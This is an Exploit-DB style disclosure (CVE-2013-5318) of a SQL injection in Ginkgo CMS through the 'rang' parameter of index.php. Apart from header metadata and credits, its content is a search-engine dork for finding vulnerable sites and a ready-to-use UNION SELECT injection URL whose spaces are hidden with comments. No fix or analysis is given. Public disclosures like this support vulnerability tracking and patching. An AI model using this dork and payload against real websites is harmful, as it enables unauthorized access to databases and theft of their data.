Ginkgo CMS (index.php, rang param) - SQL Injection



EDB-ID: 27274 CVE: 2013-5318 OSVDB-ID: 96246
Author: Raw-x Published: 2013-08-02 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
 __               ___   ________   __                       __           ____    __  __     
/\ \             /\_ \ /\_____  \ /\ \                     /\ \         /\  _`\ /\ \/\ \    
\ \ \      __  __\//\ \\/____//'/'\ \ \___      __      ___\ \ \/'\     \ \ \L\ \ \ \ \ \   
 \ \ \  __/\ \/\ \ \ \ \    //'/'  \ \  _ `\  /'__`\   /'___\ \ , <      \ \ ,  /\ \ \ \ \  
  \ \ \L\ \ \ \_\ \ \_\ \_ //'/'___ \ \ \ \ \/\ \L\.\_/\ \__/\ \ \\`\   __\ \ \\ \\ \ \_\ \ 
   \ \____/\ \____/ /\____\/\_______\\ \_\ \_\ \__/.\_\ \____\\ \_\ \_\/\_\\ \_\ \_\ \_____\
    \/___/  \/___/  \/____/\/_______/ \/_/\/_/\/__/\/_/\/____/ \/_/\/_/\/_/ \/_/\/ /\/_____/

############################################################################################
# Exploit Title   : Ginkgo CMS SQL injection                                               #
# Date            : 31 July 2013                                                           #      
# Exploit Author  : Raw-x                                                                  # 
# Site            : http://www.ginkgo-cms.com/                                             #   
# Tested on       : Linux                                                                  #    
############################################################################################

Dork: 

~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~

Examples:

http://server/index.php?rang=5'/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -


############################################################################################
#                       Thanks to:   lulzhack.ru | zentrixplus.net                         #
############################################################################################